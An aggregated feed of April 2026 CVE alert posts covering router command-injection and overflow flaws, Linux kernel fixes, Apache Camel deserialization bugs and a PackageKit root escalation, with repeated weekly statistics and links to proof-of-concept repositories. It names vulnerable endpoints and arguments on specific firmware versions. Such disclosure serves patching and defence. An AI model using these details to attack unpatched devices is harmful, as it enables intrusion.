An insufficient encryption vulnerability exists in the Device Authentication functionality of GeoVision GV-IP Device Utility 9.0.5. Listening to broadcast packets can lead to credentials leak. An attacker can listen to broadcast messages to trigge...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-42363/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:57:20.293000
1 posts
🟠 CVE-2026-7055 - High (8.8)
A security vulnerability has been detected in Tenda F456 1.0.0.5. This issue affects the function fromVirtualSer of the file /goform/VirtualSer of the component httpd. The manipulation of the argument menufacturer/Go leads to buffer overflow. The ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7055/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:57:20.293000
1 posts
🟠 CVE-2026-7057 - High (8.8)
A flaw has been found in Tenda F456 1.0.0.5. The affected element is an unknown function of the file /goform/setcfm of the component httpd. This manipulation of the argument funcname/funcpara1 causes buffer overflow. It is possible to initiate the...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7057/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:38:48.527000
1 posts
🟠 CVE-2026-7106 - High (8.8)
The Highland Software Custom Role Manager plugin for WordPress is vulnerable to Privilege Escalation in versions up to and including 1.0.0. This is due to insufficient authorization checks in the hscrm_save_user_roles() function, which is hooked t...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7106/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:37:59.213000
1 posts
🔴 CVE-2026-22337 - Critical (9.8)
Incorrect Privilege Assignment vulnerability in Directorist Directorist Social Login allows Privilege Escalation.This issue affects Directorist Social Login: from n/a before 2.1.4.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-22337/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:36:42.937000
1 posts
🔴 CVE-2026-7124 - Critical (9.8)
A vulnerability was determined in Totolink A8000RU 7.1cu.643_b20200521. Affected by this vulnerability is the function setIpv6LanCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Executing a manipulation of the argument addrPrefix...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7124/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:36:42.937000
1 posts
🔴 CVE-2026-7123 - Critical (9.8)
A vulnerability was found in Totolink A8000RU 7.1cu.643_b20200521. Affected is the function setIptvCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Performing a manipulation of the argument setIptvCfg results in os command inject...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7123/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:36:19.637000
1 posts
🟠 CVE-2026-41463 - High (8.8)
ProjeQtor versions 7.0 through 12.4.3 contain a ZipSlip path traversal vulnerability in the plugin upload functionality that allows authenticated attackers with upload permissions to write files outside the intended extraction directory by craftin...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41463/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:36:19.637000
1 posts
1 repos
🔴 CVE-2026-41462 - Critical (9.8)
ProjeQtor versions 7.0 through 12.4.3 contain an unauthenticated SQL injection vulnerability in the login functionality where the login variable is directly concatenated into a SQL query without parameterization or sanitization. Attackers can inje...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41462/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:35:53.583000
2 posts
🔴 New security advisory:
CVE-2026-7137 affects multiple systems.
• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems
Full breakdown:
https://www.yazoul.net/advisory/cve/cve-2026-7137-totolink-a8000ru-unauth-command-injection
🔴 CVE-2026-7137 - Critical (9.8)
A security vulnerability has been detected in Totolink A8000RU 7.1cu.643_b20200521. This affects the function setStorageCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument sambaEnabled leads to os co...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7137/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:35:53.583000
1 posts
🔴 CVE-2026-7139 - Critical (9.8)
A flaw has been found in Totolink A8000RU 7.1cu.643_b20200521. This issue affects the function setWiFiAclRules of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. This manipulation of the argument mode causes os command injection. The a...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7139/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:35:53.583000
1 posts
🔴 CVE-2026-7138 - Critical (9.8)
A vulnerability was detected in Totolink A8000RU 7.1cu.643_b20200521. This vulnerability affects the function setNtpCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument tz results in os command inject...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7138/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:32:22.917000
1 posts
🟠 CVE-2026-31673 - High (7.8)
In the Linux kernel, the following vulnerability has been resolved:
af_unix: read UNIX_DIAG_VFS data under unix_state_lock
Exact UNIX diag lookups hold a reference to the socket, but not to
u->path. Meanwhile, unix_release_sock() clears u->path ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31673/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:32:22.917000
1 posts
🔴 CVE-2026-31682 - Critical (9.1)
In the Linux kernel, the following vulnerability has been resolved:
bridge: br_nd_send: linearize skb before parsing ND options
br_nd_send() parses neighbour discovery options from ns->opt[] and
assumes that these options are in the linear part ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31682/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:32:22.917000
1 posts
🟠 CVE-2026-31680 - High (7.8)
In the Linux kernel, the following vulnerability has been resolved:
net: ipv6: flowlabel: defer exclusive option free until RCU teardown
`ip6fl_seq_show()` walks the global flowlabel hash under the seq-file
RCU read-side lock and prints `fl->opt...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31680/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:32:22.917000
1 posts
🟠 CVE-2026-31678 - High (7.8)
In the Linux kernel, the following vulnerability has been resolved:
openvswitch: defer tunnel netdev_put to RCU release
ovs_netdev_tunnel_destroy() may run after NETDEV_UNREGISTER already
detached the device. Dropping the netdev reference in des...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31678/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:32:22.917000
1 posts
🟠 CVE-2026-31676 - High (7.5)
In the Linux kernel, the following vulnerability has been resolved:
rxrpc: only handle RESPONSE during service challenge
Only process RESPONSE packets while the service connection is still in
RXRPC_CONN_SERVICE_CHALLENGING. Check that state unde...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31676/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:32:22.917000
1 posts
🟠 CVE-2026-31675 - High (7.8)
In the Linux kernel, the following vulnerability has been resolved:
net/sched: sch_netem: fix out-of-bounds access in packet corruption
In netem_enqueue(), the packet corruption logic uses
get_random_u32_below(skb_headlen(skb)) to select an inde...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31675/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:32:22.917000
1 posts
🔴 CVE-2026-31685 - Critical (9.4)
In the Linux kernel, the following vulnerability has been resolved:
netfilter: ip6t_eui64: reject invalid MAC header for all packets
`eui64_mt6()` derives a modified EUI-64 from the Ethernet source address
and compares it with the low 64 bits of...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31685/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:32:15
2 posts
1 repos
🟠 CVE-2026-38934 - High (8.8)
Cross Site Request Forgery vulnerability in diskoverdata diskover-community v.2.3.5. and before allows a remote attacker to escalate privileges and obtain sensitive information via the public/settings_process.php
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-38934/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-38934 - High (8.8)
Cross Site Request Forgery vulnerability in diskoverdata diskover-community v.2.3.5. and before allows a remote attacker to escalate privileges and obtain sensitive information via the public/settings_process.php
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-38934/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:32:15
2 posts
🔴 CVE-2026-7140 - Critical (9.8)
A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. Impacted is the function CsteSystem of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument HTTP leads to os command injection. The at...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7140/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-7140 - Critical (9.8)
A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. Impacted is the function CsteSystem of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument HTTP leads to os command injection. The at...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7140/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:32:15
1 posts
🔴 CVE-2026-7136 - Critical (9.8)
A weakness has been identified in Totolink A8000RU 7.1cu.643_b20200521. Affected by this issue is the function setDmzCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Executing a manipulation of the argument wanIdx can lead to os ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7136/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:32:07
1 posts
🟠 CVE-2026-30351 - High (7.5)
A path traversal vulnerability in the UI/static component of leonvanzyl autocoder commit 79d02a allows attackers to read arbitrary files via sending crafted URL path containing traversal sequences.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-30351/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:32:05
2 posts
⛔ New security advisory:
CVE-2026-40860 affects multiple systems.
• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems
Full breakdown:
https://www.yazoul.net/advisory/cve/cve-2026-40860-camel-deserialization-rce-via-jms
🔴 CVE-2026-40860 - Critical (9.8)
JmsBinding.extractBodyFromJms() in camel-jms, and the equivalent JmsBinding class in camel-sjms, deserialized the payload of incoming JMS ObjectMessage values via javax.jms.ObjectMessage.getObject() without applying any ObjectInputFilter, class al...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-40860/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:19:45.303000
1 posts
📈 CVE Published in last 7 days (2026-04-20 - 2026-04-27)
See more at https://secdb.nttzen.cloud/dashboard
Total CVEs: 1459
Severity:
- Critical: 124
- High: 358
- Medium: 586
- Low: 70
- None: 321
Status:
- : 40
- Analyzed: 313
- Awaiting Analysis: 570
- Deferred: 238
- Modified: 9
- Received: 124
- Rejected: 23
- Undergoing Analysis: 142
Top CNAs:
- GitHub, Inc.: 326
- kernel.org: 257
- VulnCheck: 119
- VulDB: 114
- Oracle: 102
- MITRE: 69
- Wordfence: 67
- Canonical Ltd.: 46
- Mozilla Corporation: 42
- N/A: 40
Top Affected Products:
- UNKNOWN: 1040
- Openclaw: 42
- Mozilla Firefox: 39
- Mozilla Thunderbird: 38
- Oracle Mysql Server: 25
- Wwbn Avideo: 18
- Flowiseai Flowise: 18
- Uutils Coreutils: 14
- Silextechnology Sd-330ac Firmware: 11
- Gitlab: 11
Top EPSS Score:
- CVE-2026-5965 - 6.34 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-5965)
- CVE-2026-41179 - 5.98 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-41179)
- CVE-2026-40887 - 4.56 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-40887)
- CVE-2026-38834 - 3.22 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-38834)
- CVE-2026-41176 - 2.79 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-41176)
- CVE-2026-21571 - 1.10 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21571)
- CVE-2026-6799 - 1.06 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-6799)
- CVE-2026-24467 - 0.76 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-24467)
- CVE-2026-41472 - 0.67 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-41472)
- CVE-2019-25714 - 0.60 % (https://secdb.nttzen.cloud/cve/detail/CVE-2019-25714)
updated 2026-04-27T16:44:38.997000
1 posts
📈 CVE Published in last 7 days (2026-04-20 - 2026-04-27)
See more at https://secdb.nttzen.cloud/dashboard
Total CVEs: 1459
Severity:
- Critical: 124
- High: 358
- Medium: 586
- Low: 70
- None: 321
Status:
- : 40
- Analyzed: 313
- Awaiting Analysis: 570
- Deferred: 238
- Modified: 9
- Received: 124
- Rejected: 23
- Undergoing Analysis: 142
Top CNAs:
- GitHub, Inc.: 326
- kernel.org: 257
- VulnCheck: 119
- VulDB: 114
- Oracle: 102
- MITRE: 69
- Wordfence: 67
- Canonical Ltd.: 46
- Mozilla Corporation: 42
- N/A: 40
Top Affected Products:
- UNKNOWN: 1040
- Openclaw: 42
- Mozilla Firefox: 39
- Mozilla Thunderbird: 38
- Oracle Mysql Server: 25
- Wwbn Avideo: 18
- Flowiseai Flowise: 18
- Uutils Coreutils: 14
- Silextechnology Sd-330ac Firmware: 11
- Gitlab: 11
Top EPSS Score:
- CVE-2026-5965 - 6.34 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-5965)
- CVE-2026-41179 - 5.98 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-41179)
- CVE-2026-40887 - 4.56 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-40887)
- CVE-2026-38834 - 3.22 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-38834)
- CVE-2026-41176 - 2.79 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-41176)
- CVE-2026-21571 - 1.10 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21571)
- CVE-2026-6799 - 1.06 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-6799)
- CVE-2026-24467 - 0.76 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-24467)
- CVE-2026-41472 - 0.67 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-41472)
- CVE-2019-25714 - 0.60 % (https://secdb.nttzen.cloud/cve/detail/CVE-2019-25714)
updated 2026-04-27T15:31:59
2 posts
1 repos
🟠 CVE-2026-40858 - High (8.8)
The camel-infinispan component's ProtoStream-based remote aggregation repository deserializes data read from a remote Infinispan cache using java.io.ObjectInputStream without applying any ObjectInputFilter. An attacker who can write to the Infinis...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-40858/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CRITICAL: CVE-2026-40858 in Apache Camel's camel-infinispan lets attackers with cache write access trigger arbitrary code execution. Patch to 4.20.0/4.14.7/4.18.2 ASAP! More info: https://radar.offseq.com/threat/cve-2026-40858-cwe-502-deserialization-of-untruste-52424157 #OffSeq #ApacheCamel #Infosec #CVE2026_40858
##updated 2026-04-27T15:31:59
1 posts
1 repos
🔴 CVE-2026-33453 - Critical (10)
Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability in Apache Camel Camel-Coap component.
Apache Camel's camel-coap component is vulnerable to Camel message header injection, leading to remote code executi...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-33453/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T15:31:55
1 posts
🟠 CVE-2026-31663 - High (7.8)
In the Linux kernel, the following vulnerability has been resolved:
xfrm: hold dev ref until after transport_finish NF_HOOK
After async crypto completes, xfrm_input_resume() calls dev_put()
immediately on re-entry before the skb reaches transpor...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31663/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T15:31:00
1 posts
🔴 CVE-2026-7125 - Critical (9.8)
A vulnerability was identified in Totolink A8000RU 7.1cu.643_b20200521. Affected by this issue is the function setWiFiEasyCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument merge leads to os command...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7125/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T15:30:52
1 posts
🟠 CVE-2026-31683 - High (7.8)
In the Linux kernel, the following vulnerability has been resolved:
batman-adv: avoid OGM aggregation when skb tailroom is insufficient
When OGM aggregation state is toggled at runtime, an existing forwarded
packet may have been allocated with o...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31683/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T15:30:52
2 posts
1 repos
🟠 CVE-2026-40473 - High (8.8)
The camel-mina component's MinaConverter.toObjectInput(IoBuffer) type converter wraps an IoBuffer in a java.io.ObjectInputStream without applying any ObjectInputFilter or class-loading restrictions. When a Camel route uses camel-mina as a TCP or U...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-40473/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-40473 - High (8.8)
The camel-mina component's MinaConverter.toObjectInput(IoBuffer) type converter wraps an IoBuffer in a java.io.ObjectInputStream without applying any ObjectInputFilter or class-loading restrictions. When a Camel route uses camel-mina as a TCP or U...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-40473/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T12:30:49
1 posts
🔴 CVE-2026-7121 - Critical (9.8)
A flaw has been found in Totolink A8000RU 7.1cu.643_b20200521. This affects the function setWizardCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. This manipulation of the argument wizard causes os command injection. It is possib...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7121/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T12:30:49
1 posts
🔴 CVE-2026-7122 - Critical (9.8)
A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. This impacts the function setUPnPCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument enable leads to os command injection. It ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7122/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T12:30:45
1 posts
🟠 CVE-2026-5941 - High (7.8)
Parsing logic flaws cause non-signature data to be misidentified as valid signatures when processing malformed form field hierarchies, leading to invalid memory writes and program crashes during internal data structure construction.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-5941/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T12:30:44
1 posts
🔴 CVE-2026-22336 - Critical (9.3)
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Directorist Booking allows SQL Injection.This issue affects Directorist Booking: from n/a before 3.0.2.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-22336/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T09:34:46
1 posts
🟠 CVE-2026-7101 - High (8.8)
A vulnerability has been found in Tenda F456 1.0.0.5. This affects the function fromWrlclientSet of the file /goform/WrlclientSet of the component httpd. The manipulation leads to buffer overflow. Remote exploitation of the attack is possible. The...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7101/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T09:34:46
1 posts
🟠 CVE-2026-42379 - High (7.7)
Insertion of Sensitive Information Into Sent Data vulnerability in WPDeveloper Templately allows Retrieve Embedded Sensitive Data.This issue affects Templately: from n/a through 3.6.1.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-42379/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T09:34:46
1 posts
🟠 CVE-2026-7097 - High (8.8)
A weakness has been identified in Tenda F456 1.0.0.5. This issue affects the function fromwebExcptypemanFilter of the file /goform/webExcptypemanFilter of the component httpd. This manipulation of the argument page causes buffer overflow. The atta...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7097/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T09:34:46
1 posts
🟠 CVE-2026-7096 - High (8.8)
A security flaw has been discovered in Tenda HG3 2.0 300003070. This vulnerability affects the function formgponConf of the file /boaform/admin/formgponConf. The manipulation of the argument fmgpon_loid results in os command injection. It is possi...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7096/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T06:31:33
2 posts
⚠️ CVE-2026-7082: HIGH severity buffer overflow in Tenda F456 v1.0.0.5 (formWrlExtraSet in httpd). Attack is remote and exploit is public. Audit exposure & restrict remote mgmt ASAP. https://radar.offseq.com/threat/cve-2026-7082-buffer-overflow-in-tenda-f456-cc536e34 #OffSeq #Vulnerability #Tenda #CVE20267082
##🟠 CVE-2026-7082 - High (8.8)
A flaw has been found in Tenda F456 1.0.0.5. Affected by this vulnerability is the function formWrlExtraSet of the file /goform/WrlExtraSet of the component httpd. Executing a manipulation of the argument Go can lead to buffer overflow. The attack...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7082/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T03:30:34
1 posts
🟠 CVE-2026-7079 - High (8.8)
A weakness has been identified in Tenda F456 1.0.0.5. This affects the function fromAdvSetWan of the file /goform/AdvSetWan of the component httpd. This manipulation of the argument wanmode causes buffer overflow. The attack may be initiated remot...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7079/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T00:30:33
1 posts
🟠 CVE-2026-7069 - High (8)
A security flaw has been discovered in D-Link DIR-825 up to 3.00b32. This impacts the function AddPortMapping of the file upnpsoap.c of the component miniupnpd. Performing a manipulation of the argument NewPortMappingDescription results in buffer ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7069/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T00:30:33
1 posts
🟠 CVE-2026-7068 - High (8.8)
A vulnerability was identified in D-Link DIR-825 3.00b32. This affects the function NMBD_process of the file sserver.c of the component nmbd. Such manipulation leads to buffer overflow. The attack can only be initiated within the local network. Th...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7068/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T00:30:33
1 posts
🟠 CVE-2026-7056 - High (8.8)
A vulnerability was detected in Tenda F456 1.0.0.5. Impacted is the function fromSafeUrlFilter of the file /goform/SafeUrlFilter of the component httpd. The manipulation of the argument page results in buffer overflow. The attack may be performed ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7056/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T00:30:33
1 posts
🟠 CVE-2026-7054 - High (8.8)
A weakness has been identified in Tenda F456 1.0.0.5. This vulnerability affects the function fromPptpUserAdd of the file /goform/PPTPDClient of the component httpd. Executing a manipulation of the argument opttype/usernamewith can lead to buffer ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7054/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T00:30:33
1 posts
🟠 CVE-2026-7053 - High (8.8)
A security flaw has been discovered in Tenda F456 1.0.0.5. This affects the function frmL7ProtForm of the file /goform/L7Prot of the component httpd. Performing a manipulation of the argument page results in buffer overflow. Remote exploitation of...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7053/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-26T12:31:47
1 posts
CVE-2026-7037: Totolink A8000RU (7.1cu.643_b20200521) — CRITICAL OS command injection flaw. Remote, unauthenticated exploit enables full device compromise. Restrict access & monitor systems. No patch yet. https://radar.offseq.com/threat/cve-2026-7037-os-command-injection-in-totolink-a80-052cff94 #OffSeq #CVE #infosec #IoT
##updated 2026-04-25T18:00:57.917000
1 posts
📈 CVE Published in last 7 days (2026-04-20 - 2026-04-27)
See more at https://secdb.nttzen.cloud/dashboard
Total CVEs: 1459
Severity:
- Critical: 124
- High: 358
- Medium: 586
- Low: 70
- None: 321
Status:
- : 40
- Analyzed: 313
- Awaiting Analysis: 570
- Deferred: 238
- Modified: 9
- Received: 124
- Rejected: 23
- Undergoing Analysis: 142
Top CNAs:
- GitHub, Inc.: 326
- kernel.org: 257
- VulnCheck: 119
- VulDB: 114
- Oracle: 102
- MITRE: 69
- Wordfence: 67
- Canonical Ltd.: 46
- Mozilla Corporation: 42
- N/A: 40
Top Affected Products:
- UNKNOWN: 1040
- Openclaw: 42
- Mozilla Firefox: 39
- Mozilla Thunderbird: 38
- Oracle Mysql Server: 25
- Wwbn Avideo: 18
- Flowiseai Flowise: 18
- Uutils Coreutils: 14
- Silextechnology Sd-330ac Firmware: 11
- Gitlab: 11
Top EPSS Score:
- CVE-2026-5965 - 6.34 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-5965)
- CVE-2026-41179 - 5.98 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-41179)
- CVE-2026-40887 - 4.56 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-40887)
- CVE-2026-38834 - 3.22 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-38834)
- CVE-2026-41176 - 2.79 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-41176)
- CVE-2026-21571 - 1.10 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21571)
- CVE-2026-6799 - 1.06 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-6799)
- CVE-2026-24467 - 0.76 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-24467)
- CVE-2026-41472 - 0.67 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-41472)
- CVE-2019-25714 - 0.60 % (https://secdb.nttzen.cloud/cve/detail/CVE-2019-25714)
updated 2026-04-24T21:10:19
1 posts
📈 CVE Published in last 7 days (2026-04-20 - 2026-04-27)
See more at https://secdb.nttzen.cloud/dashboard
Total CVEs: 1459
Severity:
- Critical: 124
- High: 358
- Medium: 586
- Low: 70
- None: 321
Status:
- : 40
- Analyzed: 313
- Awaiting Analysis: 570
- Deferred: 238
- Modified: 9
- Received: 124
- Rejected: 23
- Undergoing Analysis: 142
Top CNAs:
- GitHub, Inc.: 326
- kernel.org: 257
- VulnCheck: 119
- VulDB: 114
- Oracle: 102
- MITRE: 69
- Wordfence: 67
- Canonical Ltd.: 46
- Mozilla Corporation: 42
- N/A: 40
Top Affected Products:
- UNKNOWN: 1040
- Openclaw: 42
- Mozilla Firefox: 39
- Mozilla Thunderbird: 38
- Oracle Mysql Server: 25
- Wwbn Avideo: 18
- Flowiseai Flowise: 18
- Uutils Coreutils: 14
- Silextechnology Sd-330ac Firmware: 11
- Gitlab: 11
Top EPSS Score:
- CVE-2026-5965 - 6.34 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-5965)
- CVE-2026-41179 - 5.98 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-41179)
- CVE-2026-40887 - 4.56 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-40887)
- CVE-2026-38834 - 3.22 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-38834)
- CVE-2026-41176 - 2.79 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-41176)
- CVE-2026-21571 - 1.10 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21571)
- CVE-2026-6799 - 1.06 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-6799)
- CVE-2026-24467 - 0.76 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-24467)
- CVE-2026-41472 - 0.67 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-41472)
- CVE-2019-25714 - 0.60 % (https://secdb.nttzen.cloud/cve/detail/CVE-2019-25714)
updated 2026-04-24T13:43:37.347000
4 posts
5 repos
https://github.com/0xBlackash/CVE-2026-41651
https://github.com/Vozec/CVE-2026-41651
https://github.com/dinosn/pack2theroot-lab
Article sur une faille sur #PackageKit :
https://goodtech.info/pack2theroot-faille-linux-packagekit-root-cve-2026-41651/
Pour info packagekit est traduit en :
- Kabyle : 31%
- Occitan : 27%
- Breton : 22%
- Basque, Galicien, Catalan : +60%
##Telekom's security team warns: “Pack2TheRoot” (CVE-2026-41651) in PackageKit lets low‑privilege users install/remove system packages and escalate to root — patch to PackageKit ≥1.3.5 and apply distro updates now: https://www.heise.de/en/news/Pack2TheRoot-Security-vulnerability-affects-several-Linux-distributions-11273070.html 🔒🐧 #CyberSecurity #Linux
##updated 2026-04-23T18:32:57
2 posts
